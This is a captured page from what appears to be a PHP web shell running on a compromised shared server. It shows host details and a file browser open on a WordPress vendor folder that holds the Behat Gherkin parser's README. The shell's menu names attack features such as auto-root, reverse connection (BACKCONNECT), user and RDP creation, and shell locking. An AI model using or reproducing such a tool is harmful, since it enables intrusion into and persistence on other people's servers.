Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
behat /
gherkin /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
CHANGES.md
9.56
KB
-rw-r--r--
CONTRIBUTING.md
1.59
KB
-rw-r--r--
LICENSE
1.07
KB
-rw-r--r--
README.md
1.92
KB
-rw-r--r--
composer.json
1.83
KB
-rw-r--r--
i18n.php
37.11
KB
-rw-r--r--
libpath.php
22
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
Behat Gherkin Parser ==================== This is the php Gherkin parser for Behat. It comes bundled with more than 40 native languages (see `i18n.php`) support & clean architecture. Useful Links ------------ - Official Google Group is at [http://groups.google.com/group/behat](http://groups.google.com/group/behat) - IRC channel on [#freenode](http://freenode.net/) is `#behat` - [Note on Patches/Pull Requests](CONTRIBUTING.md) Usage Example ------------- ``` php <?php $keywords = new Behat\Gherkin\Keywords\ArrayKeywords(array( 'en' => array( 'feature' => 'Feature', 'background' => 'Background', 'scenario' => 'Scenario', 'scenario_outline' => 'Scenario Outline|Scenario Template', 'examples' => 'Examples|Scenarios', 'given' => 'Given', 'when' => 'When', 'then' => 'Then', 'and' => 'And', 'but' => 'But' ), 'en-pirate' => array( 'feature' => 'Ahoy matey!', 'background' => 'Yo-ho-ho', 'scenario' => 'Heave to', 'scenario_outline' => 'Shiver me timbers', 'examples' => 'Dead men tell no tales', 'given' => 'Gangway!', 'when' => 'Blimey!', 'then' => 'Let go and haul', 'and' => 'Aye', 'but' => 'Avast!' ) )); $lexer = new Behat\Gherkin\Lexer($keywords); $parser = new Behat\Gherkin\Parser($lexer); $feature = $parser->parse(file_get_contents('some.feature')); ``` Installing Dependencies ----------------------- ``` bash $> curl http://getcomposer.org/installer | php $> php composer.phar update ``` Contributors ------------ * Konstantin Kudryashov [everzet](http://github.com/everzet) [lead developer] * Other [awesome developers](https://github.com/Behat/Gherkin/graphs/contributors)
Close